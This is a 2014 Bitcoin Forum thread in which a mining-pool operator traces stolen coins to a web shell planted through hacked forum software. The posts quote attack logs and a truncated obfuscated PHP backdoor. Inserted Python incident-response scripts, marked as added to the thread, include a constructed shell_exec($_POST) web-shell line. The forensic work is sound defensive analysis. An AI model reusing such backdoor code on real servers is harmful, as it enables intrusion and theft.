Bitcoin Forum
Pages: « 1 [2] 3 4 »  All
Author Topic: Looks like my BTC wallet was hacked  (Read 7168 times)
theonegilly
Member, Activity: 106, Merit: 10
Your Pool Your Way - Admin
February 18, 2014, 02:00:47 AM, #21

Been speaking to Tommo on tompool.org and I've thought of one possible way that the coins were taken.

The server has a mirrored RAID setup, so it would be easy for the hosting provider to take out the second set of HDDs, set them up in a secondary system and make the commands to send the coins. It seems very simple, but it could have been done.

[Multi-Coin][Auto-Switch] Your Pool Your Way - http://yourpoolyourway.eu
fcmatt
Legendary, Activity: 2072, Merit: 1001
February 18, 2014, 02:09:00 AM, #22

Quote from: theonegilly
Been speaking to Tommo on tompool.org and I've thought of one possible way that the coins were taken.

The server has a mirrored RAID setup, so it would be easy for the hosting provider to take out the second set of HDDs, set them up in a secondary system and make the commands to send the coins. It seems very simple, but it could have been done.

The server would have logs in /var/log/messages saying the server noticed HDs removed. You cannot yank hard drives without the server knowing, well, in most cases I know of. RAID controllers are pretty verbose when it comes to drives just being pulled.
Tommo_Aus (OP)
Sr. Member, Activity: 420, Merit: 250
February 18, 2014, 02:14:29 AM, #23

Quote:
2.0.18.8 I imagine. Word on the street is that you have a problem: the update checker in the forum. I checked. You still have that code in your forum. The new version removes it.

Let's say that's it, would there be anything I could check to confirm this happened?

Tompool - http://tompool.org - a 2% fee SHA256/Scrypt/BURST/Groestl multipool supporting ANC, ASC, DGC, EZC, FLO, GLD, GME, MNC, RYC, TGC, TRC, XNC, ZET & more
fcmatt
Legendary, Activity: 2072, Merit: 1001
February 18, 2014, 02:15:55 AM, #24

Quote from: Tommo_Aus
Quote:
2.0.18.8 I imagine. Word on the street is that you have a problem: the update checker in the forum. I checked. You still have that code in your forum. The new version removes it.

Let's say that's it, would there be anything I could check to confirm this happened?

Show us the www logs right around when the RPC call was made. Do you see any POSTs or strange files being called by the webserver?

Give us 100 lines before and after the time the RPC call was made.

And I have to admit, the faster you feed us info the better.
theonegilly
Member, Activity: 106, Merit: 10
February 18, 2014, 02:16:33 AM, #25

True, true, but the company might be dodgy, setting things up so that if they did want to do anything they could.

Tommo_Aus (OP)
Sr. Member, Activity: 420, Merit: 250
February 18, 2014, 02:17:37 AM, #26

Quote from: fcmatt
And I have to admit, the faster you feed us info the better.

I'll grab it ASAP; unfortunately some real-life bits and pieces have to be attended to before I can grab this info.

fcmatt
Legendary, Activity: 2072, Merit: 1001
February 18, 2014, 02:19:45 AM, #27

Quote from: theonegilly
True, true, but the company might be dodgy, setting things up so that if they did want to do anything they could.

I admit the idea has merit, but I have not encountered a single Linux box in my career that did not complain loudly in the logs that disks were removed. RAID controller BIOS has no option to disable that stuff. That would mean a custom Linux distro was installed to disable it? Doubtful.

But going through message files looking for the disks being removed is pretty simple, depending on how far back you wish to look. Log rotation might only allow several days to look back.

What would concern me more is some automated backup process they offer that is automagically installed on the server for the customer, or he is using iSCSI from the server to a large storage box. THEN the ISP could view the backups of that or even connect to the storage box themselves.
Tommo_Aus (OP)
Sr. Member, Activity: 420, Merit: 250
February 18, 2014, 04:58:37 AM, #28

I've been looking at the www logs; this gives me a suspicious feeling unless it's a complete coincidence...

BTC stolen at these times (in PST, which is the servers timezone):

Feb 16 2014 15:11:47
Feb 16 2014 15:14:12
Feb 17 2014 10:15:30

Apache logs:

94.231.83.139 - - [16/Feb/2014:15:11:46 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1711 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0"
94.231.83.139 - - [16/Feb/2014:15:14:11 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1714 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0"
77.109.138.42 - - [17/Feb/2014:10:15:30 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1714 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"

Both IPs are located in Switzerland according to a Google search; the Smarty/2/send.php doesn't exist in the folder anymore. Am I onto something?

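The correlation Tommo_Aus did by eye in the post above, as an added example that is not part of the thread: parse Apache combined-format lines, then list every request that arrived within a few seconds before each wallet send and group the matches by endpoint and source IP. The three log lines and the three wallet timestamps are the ones quoted in the post; the fourth log line is a constructed benign request so the filter has something to ignore, and the 5-second window is an assumption.

```python
"""Correlate wallet send times with web-server requests (added example)."""
import re
from datetime import datetime, timedelta, timezone

# Apache "combined" format: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)


def parse_combined(line):
    """Parse one combined-format line; None for lines that do not match."""
    m = COMBINED_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["time"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def correlate(lines, events, window=timedelta(seconds=5)):
    """Return (event_time, request) pairs for requests in [event - window, event]."""
    requests = [r for r in map(parse_combined, lines) if r]
    return [(ev, r) for ev in events for r in requests if ev - window <= r["time"] <= ev]


def suspect_endpoints(hits):
    """Group correlated requests by (method, path) with the source IPs seen."""
    by_endpoint = {}
    for _ev, r in hits:
        by_endpoint.setdefault((r["method"], r["path"]), set()).add(r["ip"])
    return by_endpoint


PST = timezone(timedelta(hours=-8))  # the server's timezone, per the post

# Wallet send times quoted in the post.
WALLET_EVENTS = [
    datetime(2014, 2, 16, 15, 11, 47, tzinfo=PST),
    datetime(2014, 2, 16, 15, 14, 12, tzinfo=PST),
    datetime(2014, 2, 17, 10, 15, 30, tzinfo=PST),
]

# First three lines are the ones quoted in the post; the last is constructed.
ACCESS_LOG = [
    '94.231.83.139 - - [16/Feb/2014:15:11:46 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1711 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0"',
    '94.231.83.139 - - [16/Feb/2014:15:14:11 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1714 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0"',
    '77.109.138.42 - - [17/Feb/2014:10:15:30 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1714 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"',
    '10.0.0.5 - - [16/Feb/2014:15:11:40 -0800] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = correlate(ACCESS_LOG, WALLET_EVENTS)
    for ev, r in hits:
        print(f"{ev.isoformat()}  <-  {r['ip']} {r['method']} {r['path']} ({r['time'].isoformat()})")
    for (method, path), ips in suspect_endpoints(hits).items():
        print(f"{method} {path}: {sorted(ips)}")
```

Every wallet event has a POST to the same non-existent cache path one second or less before it, from two distinct IPs; the same script run over a full day of logs with the wallet's own transaction times is how you separate coincidence from a pattern.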
fcmatt
Legendary, Activity: 2072, Merit: 1001
February 18, 2014, 05:09:47 AM, #29

Quote from: Tommo_Aus
I've been looking at the www logs; this gives me a suspicious feeling unless it's a complete coincidence...

BTC stolen at these times (in PST, which is the servers timezone):

Feb 16 2014 15:11:47
Feb 16 2014 15:14:12
Feb 17 2014 10:15:30

Apache logs:

94.231.83.139 - - [16/Feb/2014:15:11:46 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1711 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0"
94.231.83.139 - - [16/Feb/2014:15:14:11 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1714 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 5.1; rv:27.0) Gecko/20100101 Firefox/27.0"
77.109.138.42 - - [17/Feb/2014:10:15:30 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1714 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"

Both IPs are located in Switzerland according to a Google search; the Smarty/2/send.php doesn't exist in the folder anymore. Am I onto something?

Yes. Disable the forum software. It has too many holes to run on the pool server.

Find out what file they read to get the RPC password and username. They had to.
Tommo_Aus (OP)
Sr. Member, Activity: 420, Merit: 250
February 18, 2014, 05:18:25 AM, #30

There seems to be a common flow of requests, it goes:

77.109.138.42 - - [17/Feb/2014:10:11:20 -0800] "GET /tompoolforum/cache/Smarty/2/index.php HTTP/1.1" 200 3170 "http://tompool.org:81/tompoolforum/cache/Smarty/2/send.php" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"

... then moments later ...

77.109.138.42 - - [17/Feb/2014:10:11:25 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1952 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"

Problem being, these files don't exist anymore, so I don't know what's in them.

Tommo_Aus (OP)
Sr. Member, Activity: 420, Merit: 250
February 18, 2014, 05:29:39 AM, #31

Interesting, I've also found a call to the file tompoolforum/library/lib.php, but I don't see this file in the Vanilla Forums project git. Viewing the file, it looks like this:

<?php
$o="QAEAOzh3b3cKDQAjYnV1aHVYdWIAAHdodXNuaWAvMC48Cg1HdGIAAHNYamZgbmRYdnJoc2J0WHUAgHJ pc25qYi83AfFoZVh0c2Z1JABzLwDRI2oBkSc6J2J/d2toY2IAEy8gJ ... (about 40 thousand characters more) ... RsbGxsbGxsbGwpOw=="));return;?>

If I load the page the source looks like this:

<style type="text/css">
   input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
</style>
<form method="POST" action="">
   <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
   <input type="hidden" name="doing" value="login">
   <input type="submit" value="Login">
</form>

It renders as a password input field with a Login button.

fcmatt
Legendary, Activity: 2072, Merit: 1001
February 18, 2014, 05:38:19 AM, #32

Quote from: Tommo_Aus
There seems to be a common flow of requests, it goes:

77.109.138.42 - - [17/Feb/2014:10:11:20 -0800] "GET /tompoolforum/cache/Smarty/2/index.php HTTP/1.1" 200 3170 "http://tompool.org:81/tompoolforum/cache/Smarty/2/send.php" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"

... then moments later ...

77.109.138.42 - - [17/Feb/2014:10:11:25 -0800] "POST /tompoolforum/cache/Smarty/2/send.php HTTP/1.1" 200 1952 "http://tompool.org:81/tompoolforum/cache/Smarty/2/index.php" "Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0"

Problem being, these files don't exist anymore, so I don't know what's in them.

That is not surprising; the files are gone. Also, the IP address is a Tor exit node, helping people keep their privacy and assisting hackers all day long. Essentially the hacker can somehow upload a file to your cache directory, which probably has permissions allowing write to the webserver. Then they POST some info to it to call the RPC command.

I think you found the problem. To learn any more would probably require me to access your server, but I do not think either of us want that. Your best bet is to completely remove the forum software and, if you want forum software again, run it on a totally different server, a throw-away box.
fcmatt
Legendary, Activity: 2072, Merit: 1001
February 18, 2014, 05:40:45 AM, #33

Quote from: Tommo_Aus
Interesting, I've also found a call to the file tompoolforum/library/lib.php, but I don't see this file in the Vanilla Forums project git. Viewing the file, it looks like this:

<?php
$o="QAEAOzh3b3cKDQAjYnV1aHVYdWIAAHdodXNuaWAvMC48Cg1HdGIAAHNYamZgbmRYdnJoc2J0WHUAgHJ pc25qYi83AfFoZVh0c2Z1JABzLwDRI2oBkSc6J2J/d2toY2IAEy8gJ ... (about 40 thousand characters more) ... RsbGxsbGxsbGwpOw=="));return;?>

If I load the page the source looks like this:

<style type="text/css">
   input {font:11px Verdana;BACKGROUND: #FFFFFF;height: 18px;border: 1px solid #666666;}
</style>
<form method="POST" action="">
   <span style="font:11px Verdana;">Password: </span><input name="password" type="password" size="20">
   <input type="hidden" name="doing" value="login">
   <input type="submit" value="Login">
</form>

It renders as a password input field with a Login button.

That is probably a base64 encrypted PHP chunk/file that the attacker used to run commands on your server. They do a POST to it, logging in and then running a command. I have seen them before; quite common. Seeing that it contains that much data means it could be a whole webpage of commands for the script kid to run.

Feel free to post the whole thing here. Let's convert it to ASCII.
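fcmatt's suggestion to convert the blob to ASCII, as an added example that is not code from the thread. The quoted lib.php is truncated (about 40 thousand characters are elided), so it cannot be decoded here; instead the script builds a constructed two-layer wrapper in the same `$o="...";eval(...)` style and peels it one layer at a time, handling the usual PHP decode chain (base64_decode, gzinflate, gzuncompress, str_rot13, strrev) and a blob held in a variable rather than inline, then scores the plaintext for web-shell markers. The marker list is an assumption drawn from common PHP shells plus the doing=login field seen on the rendered page; the sample inner payload is made up for the demonstration.

```python
"""Peel eval(base64_decode(...))-style PHP wrappers layer by layer (added example)."""
import base64
import codecs
import re
import zlib

DECODERS = ("eval", "gzinflate", "gzuncompress", "base64_decode", "str_rot13", "strrev")
# A nested call chain such as eval(gzinflate(base64_decode("..."))) or eval(base64_decode($o))
CALL_RE = re.compile(
    r"((?:(?:" + "|".join(DECODERS) + r")\s*\(\s*)+)"
    r"(?:[\"']([A-Za-z0-9+/=\s]+)[\"']|\$(\w+))\s*\)"
)
# $name = "base64blob";  (the lib.php style: blob assigned first, eval'd afterwards)
ASSIGN_RE = re.compile(r"\$(\w+)\s*=\s*[\"']([A-Za-z0-9+/=\s]+)[\"']\s*;")

# Assumed indicator list; doing=login is the hidden field from the rendered form.
SHELL_MARKERS = (b"$_POST", b"$_REQUEST", b"shell_exec", b"system(", b"passthru",
                 b"exec(", b"popen(", b"eval(", b"base64_decode", b'name="doing"')


def apply_chain(funcs, data):
    """Apply the PHP decode functions innermost first; eval is the terminal no-op."""
    for fn in reversed(funcs):
        if fn == "base64_decode":
            data = base64.b64decode(re.sub(rb"\s+", b"", data))
        elif fn == "gzinflate":
            data = zlib.decompress(data, -15)      # raw DEFLATE, like PHP gzinflate()
        elif fn == "gzuncompress":
            data = zlib.decompress(data)           # zlib-wrapped, like PHP gzuncompress()
        elif fn == "str_rot13":
            data = codecs.encode(data.decode("latin-1"), "rot13").encode("latin-1")
        elif fn == "strrev":
            data = data[::-1]
    return data


def peel(php):
    """Return the code one layer in, or None if no recognised wrapper is present."""
    m = CALL_RE.search(php)
    if not m:
        return None
    funcs = re.findall(r"[a-z0-9_]+", m.group(1))   # outermost first
    blob = m.group(2)
    if blob is None:                                # argument was a $variable
        blob = dict(ASSIGN_RE.findall(php)).get(m.group(3))
        if blob is None:
            return None
    return apply_chain(funcs, blob.encode("latin-1")).decode("latin-1")


def unwrap(php, max_layers=16):
    """All layers from the wrapper down to the first code that is not a wrapper."""
    layers = [php]
    while len(layers) <= max_layers:
        nxt = peel(layers[-1])
        if nxt is None:
            break
        layers.append(nxt)
    return layers


def shell_markers(code):
    data = code.encode("latin-1")
    return [m.decode() for m in SHELL_MARKERS if m in data]


def raw_deflate(data):
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return c.compress(data) + c.flush()


def make_sample():
    """Constructed two-layer wrapper in the lib.php style; not the real file."""
    inner = ('if ($_POST["doing"] == "login" && md5($_POST["password"]) === $pw) '
             '{ echo shell_exec($_POST["cmd"]); }')
    layer1 = 'eval(gzinflate(base64_decode("%s")));' % base64.b64encode(raw_deflate(inner.encode())).decode()
    return '<?php $o="%s";eval(base64_decode($o));return;?>' % base64.b64encode(layer1.encode()).decode()


if __name__ == "__main__":
    for depth, code in enumerate(unwrap(make_sample())):
        print(f"--- layer {depth} ({len(code)} bytes) markers={shell_markers(code)}")
        print(code[:120])
```

Run it against the real file by passing the file contents to unwrap() instead of make_sample(); the first layer's decoded bytes are often binary (a deflate stream or an XOR'd blob), which is why the decode is done on bytes and only the final text is inspected for markers.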
Tommo_Aus (OP)
Sr. Member, Activity: 420, Merit: 250
February 18, 2014, 05:54:52 AM, #34

Yep, I'm quite convinced the forum was the weakness. I've taken the forum out, so that'll be the back door gone at least, unless they built something else in while they were there.

Now I need to work out if I get back up again or call it a day.

fcmatt
Legendary, Activity: 2072, Merit: 1001
February 18, 2014, 06:00:36 AM, #35

Quote from: Tommo_Aus
Yep, I'm quite convinced the forum was the weakness. I've taken the forum out, so that'll be the back door gone at least, unless they built something else in while they were there.

Now I need to work out if I get back up again or call it a day.

Well, they could only write to places where www could write, and only run commands from the www dirs, so that limits what they could have done. But keep in mind that some are clever. They could have run a script that starts a process that listens on a high port, then deleted the file; it would stick around until a reboot.

It is probably in your best interest to move the www dir to a backup place in /blah. Then move over, file by file, things you trust that were not able to be written to by www, and rebuild the www back.
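The rebuild fcmatt describes, as an added example that is not code from the thread: hash every file under a copy you trust and under the live webroot and diff the two, list the paths the web-server account could have written to, and find bitcoind-style RPC credentials (rpcuser/rpcpassword lines, the keys bitcoin.conf uses) that other accounts can read, since the attacker had to read them from somewhere (fcmatt's point in #29). Two assumptions: "writable by www" is approximated by group/world write bits, where the real check is ownership against the www user, and the trusted/live trees are constructed in a temporary directory rather than taken from tompool.

```python
"""Webroot triage after a web-shell incident (added example)."""
import hashlib
import os
import re
import stat
import tempfile

RPC_CRED_RE = re.compile(rb"^\s*(rpcuser|rpcpassword)\s*=", re.M)


def build_manifest(root):
    """Map relative path -> sha256 for every regular file under root."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue
            h = hashlib.sha256()
            with open(full, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            manifest[os.path.relpath(full, root)] = h.hexdigest()
    return manifest


def diff_manifests(trusted, live):
    """Files only in live (planted), changed in live, or missing from live."""
    added = sorted(p for p in live if p not in trusted)
    modified = sorted(p for p in live if p in trusted and live[p] != trusted[p])
    removed = sorted(p for p in trusted if p not in live)
    return added, modified, removed


def writable_by_others(root):
    """Directories and files whose mode grants group or world write (assumed www proxy)."""
    found = []
    for dirpath, dirs, files in os.walk(root):
        for name in dirs + files:
            full = os.path.join(dirpath, name)
            mode = os.lstat(full).st_mode
            if not stat.S_ISLNK(mode) and mode & (stat.S_IWGRP | stat.S_IWOTH):
                found.append(os.path.relpath(full, root))
    return sorted(found)


def exposed_rpc_credentials(root):
    """World-readable regular files carrying rpcuser= or rpcpassword= lines."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode) or not st.st_mode & stat.S_IROTH:
                continue
            with open(full, "rb") as fh:
                if RPC_CRED_RE.search(fh.read(65536)):
                    found.append(os.path.relpath(full, root))
    return sorted(found)


def build_sample_trees():
    """Constructed trusted and live webroots in a temp dir; not real tompool files."""
    base = tempfile.mkdtemp(prefix="webroot-triage-")
    trusted, live = os.path.join(base, "trusted"), os.path.join(base, "live")
    for root in (trusted, live):
        os.makedirs(os.path.join(root, "library"))
        with open(os.path.join(root, "library", "core.php"), "w") as fh:
            fh.write("<?php echo 'forum'; ?>\n")
    # Planted file in the live tree, plus a www-writable cache holding RPC creds.
    with open(os.path.join(live, "library", "lib.php"), "w") as fh:
        fh.write('<?php $o="QUJD";eval(base64_decode($o)); ?>\n')
    os.makedirs(os.path.join(live, "cache"))
    os.chmod(os.path.join(live, "cache"), 0o777)
    with open(os.path.join(live, "cache", "pool.conf"), "w") as fh:
        fh.write("rpcuser=pool\nrpcpassword=example-not-real\n")
    os.chmod(os.path.join(live, "cache", "pool.conf"), 0o644)
    return trusted, live


def triage(trusted, live):
    added, modified, removed = diff_manifests(build_manifest(trusted), build_manifest(live))
    return {"added": added, "modified": modified, "removed": removed,
            "writable": writable_by_others(live),
            "exposed": exposed_rpc_credentials(live)}


if __name__ == "__main__":
    for key, paths in triage(*build_sample_trees()).items():
        print(f"{key}: {paths}")
```

Anything in "added" or "modified" that sits under a path in "writable" is exactly the material fcmatt says not to carry over. His other point, a listener that survives deletion of its script, is not a file-system question: on Linux, `ss -lntp` shows the listening PIDs and `readlink /proc/<pid>/exe` ends in " (deleted)" when the binary is gone, so check both before the reboot that would otherwise clear the evidence.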
Goldshredder
Full Member, Activity: 249, Merit: 100
February 18, 2014, 08:03:44 AM, #36

Quote from: Tommo_Aus
Yep, I'm quite convinced the forum was the weakness. I've taken the forum out, so that'll be the back door gone at least, unless they built something else in while they were there.

Now I need to work out if I get back up again or call it a day.

Dunno. You were evolving your pool really well, though. I was impressed. So sorry to hear about this!
apap100
Member, Activity: 105, Merit: 10
February 18, 2014, 08:30:26 AM, #37

Wow, this sucks! Have only been mining with Tom for a few days and was happy to be working with an Aus local pool. Oh well, if you come back, Tom, I will point my miners back to your pool for sure; it was just so convenient mining and getting paid in BTC each day.
freakingcat
Full Member, Activity: 121, Merit: 100
February 18, 2014, 11:03:44 AM, #38

Quote from: Tommo_Aus
Yep, I'm quite convinced the forum was the weakness. I've taken the forum out, so that'll be the back door gone at least, unless they built something else in while they were there.

Now I need to work out if I get back up again or call it a day.

I highly appreciate the work you have done on the pool and I would be eager to see it develop in future. Is there any way to send you some alt coins as a donation? I am sure many would support this idea, so maybe if we all pull together we can make up for the loss; you take a few days off to clear your head and start afresh?

We love tompool!

tertius993
Hero Member, Activity: 1029, Merit: 712
February 18, 2014, 11:12:16 AM, #39

Just to say I literally just started mining on your pool in the last day or two and I am very sorry to hear what happened.

As far as I can see you are one of the very few pools offering SHA profitability switching and payouts in BTC, so I would love to see the pool back online.

Don't let the bastards win.
eclipso
Newbie, Activity: 43, Merit: 0
February 18, 2014, 01:43:22 PM, #40

I have been mining off and on for a while and really liked the interface, and can tell you put a lot of work into it. Don't let those bastards win. I for one have faith that you are telling the truth and will defend Tom Pool's honor if anyone posts any negative bullshit on this or any other forum. Just zero everyone's account out and start over. I'm down with sending you some coin as a donation to help you rebuild. Just let the members know what we can do to help.